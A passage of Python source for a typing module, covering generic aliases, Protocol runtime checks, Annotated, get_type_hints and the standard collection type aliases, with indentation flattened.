and any(isinstance(t, ParamSpec) for t in self.__parameters__)):
params = _prepare_paramspec_params(self, params)
else:
_check_generic(self, params, len(self.__parameters__))
subst = dict(zip(self.__parameters__, params))
new_args = []
for arg in self.__args__:
if isinstance(arg, self._typevar_types):
if isinstance(arg, ParamSpec):
arg = subst[arg]
if not _is_param_expr(arg):
raise TypeError(f"Expected a list of types, an ellipsis, "
f"ParamSpec, or Concatenate. Got {arg}")
else:
arg = subst[arg]
elif isinstance(arg, (_GenericAlias, GenericAlias, types.UnionType)):
subparams = arg.__parameters__
if subparams:
subargs = tuple(subst[x] for x in subparams)
arg = arg[subargs]
# Required to flatten out the args for CallableGenericAlias
if self.__origin__ == collections.abc.Callable and isinstance(arg, tuple):
new_args.extend(arg)
else:
new_args.append(arg)
return self.copy_with(tuple(new_args))
def copy_with(self, params):
return self.__class__(self.__origin__, params, name=self._name, inst=self._inst)
def __repr__(self):
if self._name:
name = 'typing.' + self._name
else:
name = _type_repr(self.__origin__)
args = ", ".join([_type_repr(a) for a in self.__args__])
return f'{name}[{args}]'
def __reduce__(self):
if self._name:
origin = globals()[self._name]
else:
origin = self.__origin__
args = tuple(self.__args__)
if len(args) == 1 and not isinstance(args[0], tuple):
args, = args
return operator.getitem, (origin, args)
def __mro_entries__(self, bases):
if isinstance(self.__origin__, _SpecialForm):
raise TypeError(f"Cannot subclass {self!r}")
if self._name: # generic version of an ABC or built-in class
return super().__mro_entries__(bases)
if self.__origin__ is Generic:
if Protocol in bases:
return ()
i = bases.index(self)
for b in bases[i+1:]:
if isinstance(b, _BaseGenericAlias) and b is not self:
return ()
return (self.__origin__,)
# _nparams is the number of accepted parameters, e.g. 0 for Hashable,
# 1 for List and 2 for Dict. It may be -1 if variable number of
# parameters are accepted (needs custom __getitem__).
class _SpecialGenericAlias(_BaseGenericAlias, _root=True):
def __init__(self, origin, nparams, *, inst=True, name=None):
if name is None:
name = origin.__name__
super().__init__(origin, inst=inst, name=name)
self._nparams = nparams
if origin.__module__ == 'builtins':
self.__doc__ = f'A generic version of {origin.__qualname__}.'
else:
self.__doc__ = f'A generic version of {origin.__module__}.{origin.__qualname__}.'
@_tp_cache
def __getitem__(self, params):
if not isinstance(params, tuple):
params = (params,)
msg = "Parameters to generic types must be types."
params = tuple(_type_check(p, msg) for p in params)
_check_generic(self, params, self._nparams)
return self.copy_with(params)
def copy_with(self, params):
return _GenericAlias(self.__origin__, params,
name=self._name, inst=self._inst)
def __repr__(self):
return 'typing.' + self._name
def __subclasscheck__(self, cls):
if isinstance(cls, _SpecialGenericAlias):
return issubclass(cls.__origin__, self.__origin__)
if not isinstance(cls, _GenericAlias):
return issubclass(cls, self.__origin__)
return super().__subclasscheck__(cls)
def __reduce__(self):
return self._name
def __or__(self, right):
return Union[self, right]
def __ror__(self, left):
return Union[left, self]
class _CallableGenericAlias(_GenericAlias, _root=True):
def __repr__(self):
assert self._name == 'Callable'
args = self.__args__
if len(args) == 2 and _is_param_expr(args[0]):
return super().__repr__()
return (f'typing.Callable'
f'[[{', '.join([_type_repr(a) for a in args[:-1]])}], '
f'{_type_repr(args[-1])}]')
def __reduce__(self):
args = self.__args__
if not (len(args) == 2 and _is_param_expr(args[0])):
args = list(args[:-1]), args[-1]
return operator.getitem, (Callable, args)
class _CallableType(_SpecialGenericAlias, _root=True):
def copy_with(self, params):
return _CallableGenericAlias(self.__origin__, params,
name=self._name, inst=self._inst,
_typevar_types=(TypeVar, ParamSpec),
_paramspec_tvars=True)
def __getitem__(self, params):
if not isinstance(params, tuple) or len(params) != 2:
raise TypeError("Callable must be used as "
"Callable[[arg, ...], result].")
args, result = params
# This relaxes what args can be on purpose to allow things like
# PEP 612 ParamSpec. Responsibility for whether a user is using
# Callable[...] properly is deferred to static type checkers.
if isinstance(args, list):
params = (tuple(args), result)
else:
params = (args, result)
return self.__getitem_inner__(params)
@_tp_cache
def __getitem_inner__(self, params):
args, result = params
msg = "Callable[args, result]: result must be a type."
result = _type_check(result, msg)
if args is Ellipsis:
return self.copy_with((_TypingEllipsis, result))
if not isinstance(args, tuple):
args = (args,)
args = tuple(_type_convert(arg) for arg in args)
params = args + (result,)
return self.copy_with(params)
class _TupleType(_SpecialGenericAlias, _root=True):
@_tp_cache
def __getitem__(self, params):
if params == ():
return self.copy_with((_TypingEmpty,))
if not isinstance(params, tuple):
params = (params,)
if len(params) == 2 and params[1] is ...:
msg = "Tuple[t, ...]: t must be a type."
p = _type_check(params[0], msg)
return self.copy_with((p, _TypingEllipsis))
msg = "Tuple[t0, t1, ...]: each t must be a type."
params = tuple(_type_check(p, msg) for p in params)
return self.copy_with(params)
class _UnionGenericAlias(_GenericAlias, _root=True):
def copy_with(self, params):
return Union[params]
def __eq__(self, other):
if not isinstance(other, (_UnionGenericAlias, types.UnionType)):
return NotImplemented
return set(self.__args__) == set(other.__args__)
def __hash__(self):
return hash(frozenset(self.__args__))
def __repr__(self):
args = self.__args__
if len(args) == 2:
if args[0] is type(None):
return f'typing.Optional[{_type_repr(args[1])}]'
elif args[1] is type(None):
return f'typing.Optional[{_type_repr(args[0])}]'
return super().__repr__()
def __instancecheck__(self, obj):
return self.__subclasscheck__(type(obj))
def __subclasscheck__(self, cls):
for arg in self.__args__:
if issubclass(cls, arg):
return True
def __reduce__(self):
func, (origin, args) = super().__reduce__()
return func, (Union, args)
def _value_and_type_iter(parameters):
return ((p, type(p)) for p in parameters)
class _LiteralGenericAlias(_GenericAlias, _root=True):
def __eq__(self, other):
if not isinstance(other, _LiteralGenericAlias):
return NotImplemented
return set(_value_and_type_iter(self.__args__)) == set(_value_and_type_iter(other.__args__))
def __hash__(self):
return hash(frozenset(_value_and_type_iter(self.__args__)))
class _ConcatenateGenericAlias(_GenericAlias, _root=True):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs,
_typevar_types=(TypeVar, ParamSpec),
_paramspec_tvars=True)
class Generic:
"""Abstract base class for generic types.
A generic type is typically declared by inheriting from
this class parameterized with one or more type variables.
For example, a generic mapping type might be defined as::
class Mapping(Generic[KT, VT]):
def __getitem__(self, key: KT) -> VT:
...
# Etc.
This class can then be used as follows::
def lookup_name(mapping: Mapping[KT, VT], key: KT, default: VT) -> VT:
try:
return mapping[key]
except KeyError:
return default
"""
__slots__ = ()
_is_protocol = False
@_tp_cache
def __class_getitem__(cls, params):
if not isinstance(params, tuple):
params = (params,)
if not params and cls is not Tuple:
raise TypeError(
f"Parameter list to {cls.__qualname__}[...] cannot be empty")
params = tuple(_type_convert(p) for p in params)
if cls in (Generic, Protocol):
# Generic and Protocol can only be subscripted with unique type variables.
if not all(isinstance(p, (TypeVar, ParamSpec)) for p in params):
raise TypeError(
f"Parameters to {cls.__name__}[...] must all be type variables "
f"or parameter specification variables.")
if len(set(params)) != len(params):
raise TypeError(
f"Parameters to {cls.__name__}[...] must all be unique")
else:
# Subscripting a regular Generic subclass.
if any(isinstance(t, ParamSpec) for t in cls.__parameters__):
params = _prepare_paramspec_params(cls, params)
else:
_check_generic(cls, params, len(cls.__parameters__))
return _GenericAlias(cls, params,
_typevar_types=(TypeVar, ParamSpec),
_paramspec_tvars=True)
def __init_subclass__(cls, *args, **kwargs):
super().__init_subclass__(*args, **kwargs)
tvars = []
if '__orig_bases__' in cls.__dict__:
error = Generic in cls.__orig_bases__
else:
error = Generic in cls.__bases__ and cls.__name__ != 'Protocol'
if error:
raise TypeError("Cannot inherit from plain Generic")
if '__orig_bases__' in cls.__dict__:
tvars = _collect_type_vars(cls.__orig_bases__, (TypeVar, ParamSpec))
# Look for Generic[T1, ..., Tn].
# If found, tvars must be a subset of it.
# If not found, tvars is it.
# Also check for and reject plain Generic,
# and reject multiple Generic[...].
gvars = None
for base in cls.__orig_bases__:
if (isinstance(base, _GenericAlias) and
base.__origin__ is Generic):
if gvars is not None:
raise TypeError(
"Cannot inherit from Generic[...] multiple types.")
gvars = base.__parameters__
if gvars is not None:
tvarset = set(tvars)
gvarset = set(gvars)
if not tvarset <= gvarset:
s_vars = ', '.join(str(t) for t in tvars if t not in gvarset)
s_args = ', '.join(str(g) for g in gvars)
raise TypeError(f"Some type variables ({s_vars}) are"
f" not listed in Generic[{s_args}]")
tvars = gvars
cls.__parameters__ = tuple(tvars)
class _TypingEmpty:
"""Internal placeholder for () or []. Used by TupleMeta and CallableMeta
to allow empty list/tuple in specific places, without allowing them
to sneak in where prohibited.
"""
class _TypingEllipsis:
"""Internal placeholder for ... (ellipsis)."""
_TYPING_INTERNALS = ['__parameters__', '__orig_bases__', '__orig_class__',
'_is_protocol', '_is_runtime_protocol']
_SPECIAL_NAMES = ['__abstractmethods__', '__annotations__', '__dict__', '__doc__',
'__init__', '__module__', '__new__', '__slots__',
'__subclasshook__', '__weakref__', '__class_getitem__']
# These special attributes will be not collected as protocol members.
EXCLUDED_ATTRIBUTES = _TYPING_INTERNALS + _SPECIAL_NAMES + ['_MutableMapping__marker']
def _get_protocol_attrs(cls):
"""Collect protocol members from a protocol class objects.
This includes names actually defined in the class dictionary, as well
as names that appear in annotations. Special names (above) are skipped.
"""
attrs = set()
for base in cls.__mro__[:-1]: # without object
if base.__name__ in ('Protocol', 'Generic'):
continue
annotations = getattr(base, '__annotations__', {})
for attr in list(base.__dict__.keys()) + list(annotations.keys()):
if not attr.startswith('_abc_') and attr not in EXCLUDED_ATTRIBUTES:
attrs.add(attr)
return attrs
def _is_callable_members_only(cls):
# PEP 544 prohibits using issubclass() with protocols that have non-method members.
return all(callable(getattr(cls, attr, None)) for attr in _get_protocol_attrs(cls))
def _no_init_or_replace_init(self, *args, **kwargs):
cls = type(self)
if cls._is_protocol:
raise TypeError('Protocols cannot be instantiated')
# Already using a custom `__init__`. No need to calculate correct
# `__init__` to call. This can lead to RecursionError. See bpo-45121.
if cls.__init__ is not _no_init_or_replace_init:
return
# Initially, `__init__` of a protocol subclass is set to `_no_init_or_replace_init`.
# The first instantiation of the subclass will call `_no_init_or_replace_init` which
# searches for a proper new `__init__` in the MRO. The new `__init__`
# replaces the subclass' old `__init__` (ie `_no_init_or_replace_init`). Subsequent
# instantiation of the protocol subclass will thus use the new
# `__init__` and no longer call `_no_init_or_replace_init`.
for base in cls.__mro__:
init = base.__dict__.get('__init__', _no_init_or_replace_init)
if init is not _no_init_or_replace_init:
cls.__init__ = init
break
else:
# should not happen
cls.__init__ = object.__init__
cls.__init__(self, *args, **kwargs)
def _caller(depth=1, default='__main__'):
try:
return sys._getframe(depth + 1).f_globals.get('__name__', default)
except (AttributeError, ValueError): # For platforms without _getframe()
return None
def _allow_reckless_class_checks(depth=3):
"""Allow instance and class checks for special stdlib modules.
The abc and functools modules indiscriminately call isinstance() and
issubclass() on the whole MRO of a user class, which may contain protocols.
"""
return _caller(depth) in {'abc', 'functools', None}
_PROTO_ALLOWLIST = {
'collections.abc': [
'Callable', 'Awaitable', 'Iterable', 'Iterator', 'AsyncIterable',
'Hashable', 'Sized', 'Container', 'Collection', 'Reversible',
],
'contextlib': ['AbstractContextManager', 'AbstractAsyncContextManager'],
}
class _ProtocolMeta(ABCMeta):
# This metaclass is really unfortunate and exists only because of
# the lack of __instancehook__.
def __instancecheck__(cls, instance):
# We need this method for situations where attributes are
# assigned in __init__.
if (
getattr(cls, '_is_protocol', False) and
not getattr(cls, '_is_runtime_protocol', False) and
not _allow_reckless_class_checks(depth=2)
):
raise TypeError("Instance and class checks can only be used with"
" @runtime_checkable protocols")
if ((not getattr(cls, '_is_protocol', False) or
_is_callable_members_only(cls)) and
issubclass(instance.__class__, cls)):
return True
if cls._is_protocol:
if all(hasattr(instance, attr) and
# All *methods* can be blocked by setting them to None.
(not callable(getattr(cls, attr, None)) or
getattr(instance, attr) is not None)
for attr in _get_protocol_attrs(cls)):
return True
return super().__instancecheck__(instance)
class Protocol(Generic, metaclass=_ProtocolMeta):
"""Base class for protocol classes.
Protocol classes are defined as::
class Proto(Protocol):
def meth(self) -> int:
...
Such classes are primarily used with static type checkers that recognize
structural subtyping (static duck-typing), for example::
class C:
def meth(self) -> int:
return 0
def func(x: Proto) -> int:
return x.meth()
func(C()) # Passes static type check
See PEP 544 for details. Protocol classes decorated with
@typing.runtime_checkable act as simple-minded runtime protocols that check
only the presence of given attributes, ignoring their type signatures.
Protocol classes can be generic, they are defined as::
class GenProto(Protocol[T]):
def meth(self) -> T:
...
"""
__slots__ = ()
_is_protocol = True
_is_runtime_protocol = False
def __init_subclass__(cls, *args, **kwargs):
super().__init_subclass__(*args, **kwargs)
# Determine if this is a protocol or a concrete subclass.
if not cls.__dict__.get('_is_protocol', False):
cls._is_protocol = any(b is Protocol for b in cls.__bases__)
# Set (or override) the protocol subclass hook.
def _proto_hook(other):
if not cls.__dict__.get('_is_protocol', False):
return NotImplemented
# First, perform various sanity checks.
if not getattr(cls, '_is_runtime_protocol', False):
if _allow_reckless_class_checks():
return NotImplemented
raise TypeError("Instance and class checks can only be used with"
" @runtime_checkable protocols")
if not _is_callable_members_only(cls):
if _allow_reckless_class_checks():
return NotImplemented
raise TypeError("Protocols with non-method members"
" don't support issubclass()")
if not isinstance(other, type):
# Same error message as for issubclass(1, int).
raise TypeError('issubclass() arg 1 must be a class')
# Second, perform the actual structural compatibility check.
for attr in _get_protocol_attrs(cls):
for base in other.__mro__:
# Check if the members appears in the class dictionary...
if attr in base.__dict__:
if base.__dict__[attr] is None:
return NotImplemented
break
# ...or in annotations, if it is a sub-protocol.
annotations = getattr(base, '__annotations__', {})
if (isinstance(annotations, collections.abc.Mapping) and
attr in annotations and
issubclass(other, Generic) and other._is_protocol):
break
else:
return NotImplemented
return True
if '__subclasshook__' not in cls.__dict__:
cls.__subclasshook__ = _proto_hook
# We have nothing more to do for non-protocols...
if not cls._is_protocol:
return
# ... otherwise check consistency of bases, and prohibit instantiation.
for base in cls.__bases__:
if not (base in (object, Generic) or
base.__module__ in _PROTO_ALLOWLIST and
base.__name__ in _PROTO_ALLOWLIST[base.__module__] or
issubclass(base, Generic) and base._is_protocol):
raise TypeError('Protocols can only inherit from other'
' protocols, got %r' % base)
cls.__init__ = _no_init_or_replace_init
class _AnnotatedAlias(_GenericAlias, _root=True):
"""Runtime representation of an annotated type.
At its core 'Annotated[t, dec1, dec2, ...]' is an alias for the type 't'
with extra annotations. The alias behaves like a normal typing alias,
instantiating is the same as instantiating the underlying type, binding
it to types is also the same.
"""
def __init__(self, origin, metadata):
if isinstance(origin, _AnnotatedAlias):
metadata = origin.__metadata__ + metadata
origin = origin.__origin__
super().__init__(origin, origin)
self.__metadata__ = metadata
def copy_with(self, params):
assert len(params) == 1
new_type = params[0]
return _AnnotatedAlias(new_type, self.__metadata__)
def __repr__(self):
return "typing.Annotated[{}, {}]".format(
_type_repr(self.__origin__),
", ".join(repr(a) for a in self.__metadata__)
)
def __reduce__(self):
return operator.getitem, (
Annotated, (self.__origin__,) + self.__metadata__
)
def __eq__(self, other):
if not isinstance(other, _AnnotatedAlias):
return NotImplemented
return (self.__origin__ == other.__origin__
and self.__metadata__ == other.__metadata__)
def __hash__(self):
return hash((self.__origin__, self.__metadata__))
def __getattr__(self, attr):
if attr in {'__name__', '__qualname__'}:
return 'Annotated'
return super().__getattr__(attr)
class Annotated:
"""Add context specific metadata to a type.
Example: Annotated[int, runtime_check.Unsigned] indicates to the
hypothetical runtime_check module that this type is an unsigned int.
Every other consumer of this type can ignore this metadata and treat
this type as int.
The first argument to Annotated must be a valid type.
Details:
- It's an error to call `Annotated` with less than two arguments.
- Nested Annotated are flattened::
Annotated[Annotated[T, Ann1, Ann2], Ann3] == Annotated[T, Ann1, Ann2, Ann3]
- Instantiating an annotated type is equivalent to instantiating the
underlying type::
Annotated[C, Ann1](5) == C(5)
- Annotated can be used as a generic type alias::
Optimized = Annotated[T, runtime.Optimize()]
Optimized[int] == Annotated[int, runtime.Optimize()]
OptimizedList = Annotated[List[T], runtime.Optimize()]
OptimizedList[int] == Annotated[List[int], runtime.Optimize()]
"""
__slots__ = ()
def __new__(cls, *args, **kwargs):
raise TypeError("Type Annotated cannot be instantiated.")
@_tp_cache
def __class_getitem__(cls, params):
if not isinstance(params, tuple) or len(params) < 2:
raise TypeError("Annotated[...] should be used "
"with at least two arguments (a type and an "
"annotation).")
msg = "Annotated[t, ...]: t must be a type."
origin = _type_check(params[0], msg)
metadata = tuple(params[1:])
return _AnnotatedAlias(origin, metadata)
def __init_subclass__(cls, *args, **kwargs):
raise TypeError(
"Cannot subclass {}.Annotated".format(cls.__module__)
)
def runtime_checkable(cls):
"""Mark a protocol class as a runtime protocol.
Such protocol can be used with isinstance() and issubclass().
Raise TypeError if applied to a non-protocol class.
This allows a simple-minded structural check very similar to
one trick ponies in collections.abc such as Iterable.
For example::
@runtime_checkable
class Closable(Protocol):
def close(self): ...
assert isinstance(open('/some/file'), Closable)
Warning: this will check only the presence of the required methods,
not their type signatures!
"""
if not issubclass(cls, Generic) or not cls._is_protocol:
raise TypeError('@runtime_checkable can be only applied to protocol classes,'
' got %r' % cls)
cls._is_runtime_protocol = True
return cls
def cast(typ, val):
"""Cast a value to a type.
This returns the value unchanged. To the type checker this
signals that the return value has the designated type, but at
runtime we intentionally don't check anything (we want this
to be as fast as possible).
"""
return val
def _get_defaults(func):
"""Internal helper to extract the default arguments, by name."""
try:
code = func.__code__
except AttributeError:
# Some built-in functions don't have __code__, __defaults__, etc.
return {}
pos_count = code.co_argcount
arg_names = code.co_varnames
arg_names = arg_names[:pos_count]
defaults = func.__defaults__ or ()
kwdefaults = func.__kwdefaults__
res = dict(kwdefaults) if kwdefaults else {}
pos_offset = pos_count - len(defaults)
for name, value in zip(arg_names[pos_offset:], defaults):
assert name not in res
res[name] = value
return res
_allowed_types = (types.FunctionType, types.BuiltinFunctionType,
types.MethodType, types.ModuleType,
WrapperDescriptorType, MethodWrapperType, MethodDescriptorType)
def get_type_hints(obj, globalns=None, localns=None, include_extras=False):
"""Return type hints for an object.
This is often the same as obj.__annotations__, but it handles
forward references encoded as string literals, adds Optional[t] if a
default value equal to None is set and recursively replaces all
'Annotated[T, ...]' with 'T' (unless 'include_extras=True').
The argument may be a module, class, method, or function. The annotations
are returned as a dictionary. For classes, annotations include also
inherited members.
TypeError is raised if the argument is not of a type that can contain
annotations, and an empty dictionary is returned if no annotations are
present.
BEWARE -- the behavior of globalns and localns is counterintuitive
(unless you are familiar with how eval() and exec() work). The
search order is locals first, then globals.
- If no dict arguments are passed, an attempt is made to use the
globals from obj (or the respective module's globals for classes),
and these are also used as the locals. If the object does not appear
to have globals, an empty dictionary is used. For classes, the search
order is globals first then locals.
- If one dict argument is passed, it is used for both globals and
locals.
- If two dict arguments are passed, they specify globals and
locals, respectively.
"""
if getattr(obj, '__no_type_check__', None):
return {}
# Classes require a special treatment.
if isinstance(obj, type):
hints = {}
for base in reversed(obj.__mro__):
if globalns is None:
base_globals = getattr(sys.modules.get(base.__module__, None), '__dict__', {})
else:
base_globals = globalns
ann = base.__dict__.get('__annotations__', {})
if isinstance(ann, types.GetSetDescriptorType):
ann = {}
base_locals = dict(vars(base)) if localns is None else localns
if localns is None and globalns is None:
# This is surprising, but required. Before Python 3.10,
# get_type_hints only evaluated the globalns of
# a class. To maintain backwards compatibility, we reverse
# the globalns and localns order so that eval() looks into
# *base_globals* first rather than *base_locals*.
# This only affects ForwardRefs.
base_globals, base_locals = base_locals, base_globals
for name, value in ann.items():
if value is None:
value = type(None)
if isinstance(value, str):
value = ForwardRef(value, is_argument=False, is_class=True)
value = _eval_type(value, base_globals, base_locals)
hints[name] = value
return hints if include_extras else {k: _strip_annotations(t) for k, t in hints.items()}
if globalns is None:
if isinstance(obj, types.ModuleType):
globalns = obj.__dict__
else:
nsobj = obj
# Find globalns for the unwrapped object.
while hasattr(nsobj, '__wrapped__'):
nsobj = nsobj.__wrapped__
globalns = getattr(nsobj, '__globals__', {})
if localns is None:
localns = globalns
elif localns is None:
localns = globalns
hints = getattr(obj, '__annotations__', None)
if hints is None:
# Return empty annotations for something that _could_ have them.
if isinstance(obj, _allowed_types):
return {}
else:
raise TypeError('{!r} is not a module, class, method, '
'or function.'.format(obj))
defaults = _get_defaults(obj)
hints = dict(hints)
for name, value in hints.items():
if value is None:
value = type(None)
if isinstance(value, str):
# class-level forward refs were handled above, this must be either
# a module-level annotation or a function argument annotation
value = ForwardRef(
value,
is_argument=not isinstance(obj, types.ModuleType),
is_class=False,
)
value = _eval_type(value, globalns, localns)
if name in defaults and defaults[name] is None:
value = Optional[value]
hints[name] = value
return hints if include_extras else {k: _strip_annotations(t) for k, t in hints.items()}
def _strip_annotations(t):
"""Strips the annotations from a given type.
"""
if isinstance(t, _AnnotatedAlias):
return _strip_annotations(t.__origin__)
if isinstance(t, _GenericAlias):
stripped_args = tuple(_strip_annotations(a) for a in t.__args__)
if stripped_args == t.__args__:
return t
return t.copy_with(stripped_args)
if isinstance(t, GenericAlias):
stripped_args = tuple(_strip_annotations(a) for a in t.__args__)
if stripped_args == t.__args__:
return t
return GenericAlias(t.__origin__, stripped_args)
if isinstance(t, types.UnionType):
stripped_args = tuple(_strip_annotations(a) for a in t.__args__)
if stripped_args == t.__args__:
return t
return functools.reduce(operator.or_, stripped_args)
return t
def get_origin(tp):
"""Get the unsubscripted version of a type.
This supports generic types, Callable, Tuple, Union, Literal, Final, ClassVar
and Annotated. Return None for unsupported types. Examples::
get_origin(Literal[42]) is Literal
get_origin(int) is None
get_origin(ClassVar[int]) is ClassVar
get_origin(Generic) is Generic
get_origin(Generic[T]) is Generic
get_origin(Union[T, int]) is Union
get_origin(List[Tuple[T, T]][int]) == list
get_origin(P.args) is P
"""
if isinstance(tp, _AnnotatedAlias):
return Annotated
if isinstance(tp, (_BaseGenericAlias, GenericAlias,
ParamSpecArgs, ParamSpecKwargs)):
return tp.__origin__
if tp is Generic:
return Generic
if isinstance(tp, types.UnionType):
return types.UnionType
return None
def get_args(tp):
"""Get type arguments with all substitutions performed.
For unions, basic simplifications used by Union constructor are performed.
Examples::
get_args(Dict[str, int]) == (str, int)
get_args(int) == ()
get_args(Union[int, Union[T, int], str][int]) == (int, str)
get_args(Union[int, Tuple[T, int]][str]) == (int, Tuple[str, int])
get_args(Callable[[], T][int]) == ([], int)
"""
if isinstance(tp, _AnnotatedAlias):
return (tp.__origin__,) + tp.__metadata__
if isinstance(tp, (_GenericAlias, GenericAlias)):
res = tp.__args__
if (tp.__origin__ is collections.abc.Callable
and not (len(res) == 2 and _is_param_expr(res[0]))):
res = (list(res[:-1]), res[-1])
return res
if isinstance(tp, types.UnionType):
return tp.__args__
return ()
def is_typeddict(tp):
"""Check if an annotation is a TypedDict class
For example::
class Film(TypedDict):
title: str
year: int
is_typeddict(Film) # => True
is_typeddict(Union[list, str]) # => False
"""
return isinstance(tp, _TypedDictMeta)
def no_type_check(arg):
"""Decorator to indicate that annotations are not type hints.
The argument must be a class or function; if it is a class, it
applies recursively to all methods and classes defined in that class
(but not to methods defined in its superclasses or subclasses).
This mutates the function(s) or class(es) in place.
"""
if isinstance(arg, type):
arg_attrs = arg.__dict__.copy()
for attr, val in arg.__dict__.items():
if val in arg.__bases__ + (arg,):
arg_attrs.pop(attr)
for obj in arg_attrs.values():
if isinstance(obj, types.FunctionType):
obj.__no_type_check__ = True
if isinstance(obj, type):
no_type_check(obj)
try:
arg.__no_type_check__ = True
except TypeError: # built-in classes
pass
return arg
def no_type_check_decorator(decorator):
"""Decorator to give another decorator the @no_type_check effect.
This wraps the decorator with something that wraps the decorated
function in @no_type_check.
"""
@functools.wraps(decorator)
def wrapped_decorator(*args, **kwds):
func = decorator(*args, **kwds)
func = no_type_check(func)
return func
return wrapped_decorator
def _overload_dummy(*args, **kwds):
"""Helper for @overload to raise when called."""
raise NotImplementedError(
"You should not call an overloaded function. "
"A series of @overload-decorated functions "
"outside a stub module should always be followed "
"by an implementation that is not @overload-ed.")
def overload(func):
"""Decorator for overloaded functions/methods.
In a stub file, place two or more stub definitions for the same
function in a row, each decorated with @overload. For example:
@overload
def utf8(value: None) -> None: ...
@overload
def utf8(value: bytes) -> bytes: ...
@overload
def utf8(value: str) -> bytes: ...
In a non-stub file (i.e. a regular .py file), do the same but
follow it with an implementation. The implementation should *not*
be decorated with @overload. For example:
@overload
def utf8(value: None) -> None: ...
@overload
def utf8(value: bytes) -> bytes: ...
@overload
def utf8(value: str) -> bytes: ...
def utf8(value):
# implementation goes here
"""
return _overload_dummy
def final(f):
"""A decorator to indicate final methods and final classes.
Use this decorator to indicate to type checkers that the decorated
method cannot be overridden, and decorated class cannot be subclassed.
For example:
class Base:
@final
def done(self) -> None:
...
class Sub(Base):
def done(self) -> None: # Error reported by type checker
...
@final
class Leaf:
...
class Other(Leaf): # Error reported by type checker
...
There is no runtime checking of these properties.
"""
return f
# Some unconstrained type variables. These are used by the container types.
# (These are not for export.)
T = TypeVar('T') # Any type.
KT = TypeVar('KT') # Key type.
VT = TypeVar('VT') # Value type.
T_co = TypeVar('T_co', covariant=True) # Any type covariant containers.
V_co = TypeVar('V_co', covariant=True) # Any type covariant containers.
VT_co = TypeVar('VT_co', covariant=True) # Value type covariant containers.
T_contra = TypeVar('T_contra', contravariant=True) # Ditto contravariant.
# Internal type variable used for Type[].
CT_co = TypeVar('CT_co', covariant=True, bound=type)
# A useful type variable with constraints. This represents string types.
# (This one *is* for export!)
AnyStr = TypeVar('AnyStr', bytes, str)
# Various ABCs mimicking those in collections.abc.
_alias = _SpecialGenericAlias
Hashable = _alias(collections.abc.Hashable, 0) # Not generic.
Awaitable = _alias(collections.abc.Awaitable, 1)
Coroutine = _alias(collections.abc.Coroutine, 3)
AsyncIterable = _alias(collections.abc.AsyncIterable, 1)
AsyncIterator = _alias(collections.abc.AsyncIterator, 1)
Iterable = _alias(collections.abc.Iterable, 1)
Iterator = _alias(collections.abc.Iterator, 1)
Reversible = _alias(collections.abc.Reversible, 1)
Sized = _alias(collections.abc.Sized, 0) # Not generic.
Container = _alias(collections.abc.Container, 1)
Collection = _alias(collections.abc.Collection, 1)
Callable = _CallableType(collections.abc.Callable, 2)
Callable.__doc__ = \
"""Callable type; Callable[[int], str] is a function of (int) -> str.
The subscription syntax must always be used with exactly two
values: the argument list and the return type. The argument list
must be a list of types or ellipsis; the return type must be a single type.
There is no syntax to indicate optional or keyword arguments,
such function types are rarely used as callback types.
"""
AbstractSet = _alias(collections.abc.Set, 1, name='AbstractSet')
MutableSet = _alias(collections.abc.MutableSet, 1)
# NOTE: Mapping is only covariant in the value type.
Mapping = _alias(collections.abc.Mapping, 2)
MutableMapping = _alias(collections.abc.MutableMapping, 2)
Sequence = _alias(collections.abc.Sequence, 1)
MutableSequence = _alias(collections.abc.MutableSequence, 1)
ByteString = _alias(collections.abc.ByteString, 0) # Not generic
# Tuple accepts variable number of parameters.
Tuple = _TupleType(tuple, -1, inst=False, name='Tuple')
Tuple.__doc__ = \
"""Tuple type; Tuple[X, Y] is the cross-product type of X and Y.
Example: Tuple[T1, T2] is a tuple of two elements corresponding
to type variables T1 and T2. Tuple[int, float, str] is a tuple
of an int, a float and a string.
To specify a variable-length tuple of homogeneous type, use Tuple[T, ...].
"""
List = _alias(list, 1, inst=False, name='List')
Deque = _alias(collections.deque, 1, name='Deque')
Set = _alias(set, 1, inst=False, name='Set')
FrozenSet = _alias(frozenset, 1, inst=False, name='FrozenSet')
MappingView = _alias(collections.abc.MappingView, 1)
KeysView = _alias(collections.abc.KeysView, 1)
ItemsView = _alias(collections.abc.ItemsView, 2)
ValuesView = _alias(collections.abc.ValuesView, 1)
ContextManager = _alias(contextlib.AbstractContextManager, 1, name='ContextManager')
AsyncContextManager = _alias(contextlib.AbstractAsyncContextManager, 1, name='AsyncContextManager')
Dict = _alias(dict, 2, inst=False, name='Dict')
DefaultDict = _alias(collections.defaultdict, 2, name='DefaultDict')
OrderedDict = _alias(collections.OrderedDict, 2)
Counter = _alias(collections.Counter, 1)
ChainMap = _alias(collections.ChainMap, 2)
Generator = _alias(collections.abc.Generator, 3)
AsyncGenerator = _alias(collections.abc.AsyncGenerator, 2)
Type = _alias(type, 1, inst=False, name='Type')
Type.__doc__ = \
"""A special construct usable to annotate class objects.
For example, suppose we have the following classes::
class User: ... # Abstract base for User classes
class BasicUser(User): ...
class ProUser(User): ...
class TeamUser(User): ...
And a function that takes a class argument that's a subclass of
User and returns an instance of the corresponding class::
U = TypeVar('U', bound=User)
def new_user(user_class: Type[U]) -> U:
user = user_class()
# (Here we could write the user object to a database)
return user
joe = new_user(BasicUser)
At this point the type checker knows that joe has type BasicUser.
"""
@runtime_checkable
class SupportsInt(Protocol):
"""An ABC with one abstract method __int__."""
__slots__ = ()
@abstractmethod
def __int__(self) -> int:
pass
@runtime_checkable
class SupportsFloat(Protocol):
"""An ABC with one abstract method __float__."""
__slots__ = ()
@abstractmethod
def __float__(self) -> float:
pass
@runtime_checkable
class SupportsComplex(Protocol):
"""An ABC with one abstract method __complex__."""
__slots__ = ()
@abstractmethod
def __complex__(self) -> complex:
pass
@runtime_checkable
class SupportsBytes(Protocol):
"""An ABC with one abstract method __bytes__."""
__slots__ = ()
@abstractmethod
def __bytes__(self) -> bytes:
pass
@runtime_checkable
class SupportsIndex(Protocol):
"""An ABC with one abstract method __index__."""
__slots__ = ()
@abstractmethod
def __index__(self) -> int:
pass
@runtime_checkable
class SupportsAbs(Protocol[T_co]):
"""An ABC with one abstract method __abs__ that is covariant in its return type."""
__slots__ = ()
@abstractmethod
def __abs__(self) -> T_co:
pass
@runtime_checkable
class SupportsRound(Protocol[T_co]):
"""An ABC with one abstract method __round__ that is covariant in its return type."""
__slots__ = ()
@abstractmethod
def __round__(self, ndigits: int = 0) -> T_co:
pass
def _make_nmtuple(name, types, module, defaults = ()):
fields = [n for n, t in types]
